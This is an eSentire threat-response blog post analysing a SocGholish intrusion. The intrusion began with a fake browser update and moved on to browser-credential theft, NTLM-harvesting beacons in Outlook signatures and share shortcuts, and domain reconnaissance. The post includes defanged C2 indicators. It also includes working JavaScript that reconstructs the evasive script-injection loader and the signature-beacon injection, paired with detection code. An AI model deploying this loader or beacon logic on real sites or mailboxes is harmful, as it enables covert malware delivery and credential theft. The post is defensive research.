2024-06-15 - This blog has been updated with additional details regarding the purpose behind email signature modification.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
In April 2024, eSentire's Threat Response Unit (TRU) identified hands-on-keyboard activity and traced it to a SocGholish infection initiated by a fake browser update. The fake update was delivered as obfuscated JavaScript to evade detection and establish a foothold in the environment.
The attackers used living-off-the-land techniques to collect saved credentials and, notably, planted web beacons in both Outlook email signatures and a network share to map the victim's internal and business-to-business relationships. This suggests an interest in exploiting those relationships to target the victim's business peers.
The infection began when the user visited a compromised website and downloaded a fake browser update delivered as a JavaScript file named "Update.js" (MD5: 44a0b845b30dcdc26c8017a6714c46e9).
The compromised webpage contained injected JavaScript (Figure 1), which loaded obfuscated JavaScript from a remote link (Figure 2).
A snippet of the deobfuscated script is shown below (Figure 3).
The script first checks whether the browser is being driven by an automation framework such as Selenium by reading the navigator.webdriver property. If it is true, the script loads a secondary script from a SocGholish URL and stops (lines 8-12). Serving automated visitors a different branch this way is designed to evade sandboxes and crawlers.
Next, the script compares the window's outer and inner dimensions (window.outerHeight minus window.innerHeight, and likewise for width). A large gap usually means a docked developer-tools pane is open, i.e. someone is inspecting the page. If the gap exceeds the script's threshold, it loads another script from a second URL (lines 14-21).
It then checks whether the visitor is logged in to the WordPress site hosting the injection by looking for cookies named "wordpress_logged_in" or "wp-settings". If either is present the script does nothing further (lines 23-27), presumably so that the site's own administrators never see the fake update and the compromise stays unnoticed for longer.
If none of these conditions trigger, the script registers a mousemove listener. On the first mouse movement it removes the listener and loads the fake-update script from a third URL (lines 32-37). Gating on user interaction means the malicious request is never made during a headless or scripted page load, which defeats detection that only examines what happens at load time.
The _0x4d8183 function (lines 40-47) performs the actual injection: it takes a URL, creates a <script> element, sets its src attribute to that URL, and inserts the element into the DOM next to the first <script> tag already in the document. Because the new element is an ordinary script tag, the remote code runs with the full privileges of the compromised page's origin.
The URLs referenced in the script are:
Each is requested only when its corresponding condition is met: detection of an automation framework, detection of an inspected window, or the first user interaction.
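The loader's decision tree, reconstructed as an added example. This is plain JavaScript written for this write-up, not the obfuscated code from the compromised site: the three stage URLs, the size threshold used to spot an inspected window, and the minimal fake window and document that let it run under Node without a browser are all assumptions.

```javascript
// Added example: readable reconstruction of the gating logic in the injected
// SocGholish loader. Not the original obfuscated code. Stage URLs, the size
// threshold and the fake DOM/window below are assumptions for offline use.

const STAGE = {                       // placeholders for the three loader URLs
  automation: "https://stage.invalid/automation",
  devtools:   "https://stage.invalid/devtools",
  update:     "https://stage.invalid/update",
};
const SIZE_GAP = 160; // assumed threshold; a docked DevTools pane widens the outer/inner gap well past this

// Decide which branch the loader takes. `env` carries the values the loader reads
// from navigator.webdriver, window.outer/innerWidth/Height and document.cookie.
function classify(env) {
  if (env.webdriver === true) {
    return { action: "load", url: STAGE.automation, reason: "navigator.webdriver set" };
  }
  const widthGap = env.outerWidth - env.innerWidth;
  const heightGap = env.outerHeight - env.innerHeight;
  if (widthGap > SIZE_GAP || heightGap > SIZE_GAP) {
    return { action: "load", url: STAGE.devtools, reason: "window size gap (devtools?)" };
  }
  if (/wordpress_logged_in|wp-settings/.test(env.cookie || "")) {
    return { action: "abort", url: null, reason: "WordPress session cookie present" };
  }
  return { action: "defer", url: STAGE.update, reason: "wait for first mousemove" };
}

// Equivalent of the _0x4d8183 helper: build <script src=url> and place it next to
// the first <script> already in the page. Works on a real document or the fake below.
function injectScript(doc, url) {
  const el = doc.createElement("script");
  el.src = url;
  const first = doc.getElementsByTagName("script")[0];
  first.parentNode.insertBefore(el, first);
  return el;
}

// Run the loader once against a (fake or real) window and document.
function runLoader(env, doc, win) {
  const decision = classify(env);
  if (decision.action === "load") {
    injectScript(doc, decision.url);
  } else if (decision.action === "defer") {
    const once = () => {                 // fires once, then removes itself
      win.removeEventListener("mousemove", once);
      injectScript(doc, decision.url);
    };
    win.addEventListener("mousemove", once);
  }
  return decision;
}

// --- Minimal offline stand-ins for the DOM APIs used above (test scaffolding) ---
function fakeDocument() {
  const scripts = [];
  const head = {
    insertBefore(node, ref) { scripts.splice(scripts.indexOf(ref), 0, node); node.parentNode = head; return node; },
  };
  scripts.push({ tagName: "SCRIPT", src: "/site.js", parentNode: head }); // the page's own script
  return {
    createElement: (tag) => ({ tagName: tag.toUpperCase(), src: "", parentNode: null }),
    getElementsByTagName: (tag) => scripts.filter((n) => n.tagName === tag.toUpperCase()),
    scriptSources: () => scripts.map((n) => n.src),   // helper for inspection
  };
}
function fakeWindow() {
  const listeners = {};
  return {
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    removeEventListener(type, fn) { listeners[type] = (listeners[type] || []).filter((f) => f !== fn); },
    fire(type) { for (const fn of [...(listeners[type] || [])]) fn(); },  // simulate an event
    listenerCount: (type) => (listeners[type] || []).length,
  };
}
```

Driving runLoader with webdriver set, or with a harness that never dispatches a mousemove, shows why a crawler sees either a decoy stage or nothing at all; a sandbox that sends a synthetic mouse move before collecting outbound script requests sees the real one.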
The downloaded Update.js file is itself obfuscated JavaScript (Figure 4). A .js file opened from Downloads runs under the Windows Script Host (wscript.exe) rather than in the browser, so it executes with the user's ordinary privileges on the host.
Once deobfuscated, the script issues a POST request to hxxps://tfuq.register.arpsychotherapy[.]com/editContent; the request object's "send" method transmits the base64-encoded body "lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==" to the server (Figure 5).
Post-exploitation Activity
Seventeen minutes after the user executed the malicious JavaScript payload, we identified hands-on-keyboard activity on the victim host. This activity included extraction and decryption of stored browser passwords, and reconnaissance.
Password Store Extraction
The threat actors copied the saved login data from Microsoft Edge and Google Chrome (each browser's "Login Data" SQLite database) to a temporary file for exfiltration using the following commands:
Shortly after, another command copied the Login Data files from both browsers to a different user's Downloads directory and logged output or errors to a temporary file (username is the primary infected user; username_2 is another user on the same machine):
Staging a second copy under another user's profile is likely redundancy in case the primary copies are discovered and removed.
Encryption Key Retrieval
Next, the threat actors ran a base64-encoded PowerShell command. The decoded command retrieves the encryption keys that Edge and Chrome use for saved passwords and cookies, unprotects them with the Windows Data Protection API (DPAPI), and writes the results to a temporary file. On Chromium-based browsers this key is stored DPAPI-protected as the os_crypt.encrypted_key value in the Local State file, and DPAPI will only unprotect it in the context of the same Windows user, which is why this step had to run on the victim host; with the key and the copied databases, the credentials can then be decrypted offline.
The decoded commands:
Python Script Execution
Subsequently, the threat actors attempted the same PowerShell command ten times. It downloads, extracts and sets up a portable Python distribution under the AppData\Local\ConnectedDevicesPlatform path (a folder that legitimately exists in Windows user profiles, which helps it blend in), presumably to run additional Python payloads; the repetition suggests the attempts were not succeeding.
Email Contact Reconnaissance
The threat actors then ran a base64-encoded PowerShell command that modifies the HTML signature files used by Microsoft Outlook.
The command enumerates every .htm file in the directory where Outlook stores email signatures and replaces the </body> tag with an <img> tag, whose src points at a remote server specified in the command, followed by the original </body>. Output from the command is redirected to a temporary file for logging.
The purpose is to harvest NetNTLM hashes via the email signatures: whenever a mail client renders the signature and requests the remote image, it can be coerced into NTLM authentication to the attacker's server, leaking the requesting user's NetNTLM hash for offline cracking or relay, and incidentally revealing who the victim corresponds with (special thanks to Max Anderson, an Assistant Vice President at Pondurance, for bringing this to our attention). You can read more about the technique here.
Network Discovery
The threat actors then enumerated the members of the "Domain Users" group by running C:\Windows\system32\net1 group "domain users" /domain. net1.exe is the helper binary that net.exe itself hands off to, so invoking it directly sidesteps detection rules that key only on net.exe.
The last command creates shortcut (.lnk) files inside a network share. Each shortcut's target path points back to the share location, while its icon location points to the SocGholish C2 server, 170.130.55[.]72/Documentation.ico.
We assume the purpose is the same as for the email signatures: Explorer resolves a shortcut's icon as soon as the folder is displayed, so every user who browses the share makes their machine reach out to the attacker's host, exposing who has access to the share and giving the attacker another opportunity to capture NTLM authentication.
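To make the two beacon placements concrete, here is an added example written for this article (not eSentire's tooling and not the actors' command): the signature tampering reproduced as a string edit, beside a check that flags <img> sources in signature HTML and icon locations of shortcut files that would make a Windows client contact an external host. The sample signature and the beacon host are constructed for the example.

```javascript
// Added example: the Outlook signature tampering described above, reproduced as a
// string transformation, next to a check that finds such beacons in signature HTML
// and in shortcut icon locations. Not eSentire's code; BEACON_URL and the sample
// signature are constructed placeholders.

const BEACON_URL = "http://beacon.invalid/sig.png"; // placeholder, not the real C2

// What the attacker's PowerShell did to each signature .htm: an <img> immediately
// before the closing </body>. Reproduced only so the detector has something to find.
function injectBeacon(html, url) {
  return html.replace(/<\/body>/i, `<img src="${url}" width="1" height="1" /></body>`);
}

// Classify where a referenced resource lives. UNC paths and file://host/ URLs are
// fetched over SMB, so Windows authenticates (NTLM) automatically; http(s) targets
// can coerce NTLM with a 401 challenge. cid:/data: references are embedded content.
function classifyReference(src) {
  const s = src.trim();
  if (/^\\\\[^\\]+\\/.test(s) || /^file:\/\/[^\/]/i.test(s)) return "unc";
  if (/^https?:\/\//i.test(s)) return "remote-http";
  if (/^(cid|data):/i.test(s)) return "embedded";
  return "local";
}

// Host portion of a UNC path or URL, or null if there is none.
function referencedHost(src) {
  const m = src.trim().match(/^(?:https?:\/\/|\\\\|file:\/\/)([^\/\\:?#]+)/i);
  return m ? m[1] : null;
}

// Scan signature HTML for <img> sources that would make the recipient's client
// contact an external host. Returns one finding per suspicious image.
function findSignatureBeacons(html) {
  const findings = [];
  const imgRe = /<img\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>/gi;
  let m;
  while ((m = imgRe.exec(html)) !== null) {
    const src = m[1] ?? m[2] ?? m[3] ?? "";
    const kind = classifyReference(src);
    if (kind === "unc" || kind === "remote-http") {
      findings.push({ src, kind, host: referencedHost(src) });
    }
  }
  return findings;
}

// The same check applied to a shortcut's IconLocation, the trick used on the share.
function checkShortcutIcon(iconLocation) {
  const kind = classifyReference(iconLocation);
  const suspicious = kind === "unc" || kind === "remote-http";
  return { suspicious, kind, host: suspicious ? referencedHost(iconLocation) : null };
}

// Constructed sample: a benign signature whose logo is an embedded attachment.
const CLEAN_SIGNATURE = `<html><body><p>Jane Doe<br>Example Corp</p>
<img src="cid:logo@example" alt="logo"></body></html>`;
```

In a real sweep, run findSignatureBeacons over every .htm under each user's Outlook signatures folder and checkShortcutIcon over the icon location of every .lnk on shared drives; a legitimate signature almost never references an image by UNC path or by an external host, so any hit is worth an analyst's eyes.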
This SocGholish intrusion illustrates the group's approach: social engineering via a fake browser update to gain entry, followed by scripted hands-on-keyboard actions to extract credentials and plant beacons that reveal who the victim interacts with.
Our team of 24/7 SOC Cyber Analysts isolated the affected host and notified the customer of suspicious activities.
We recommend implementing the following controls to help secure your organization against SocGholish malware:
You can access the indicators here.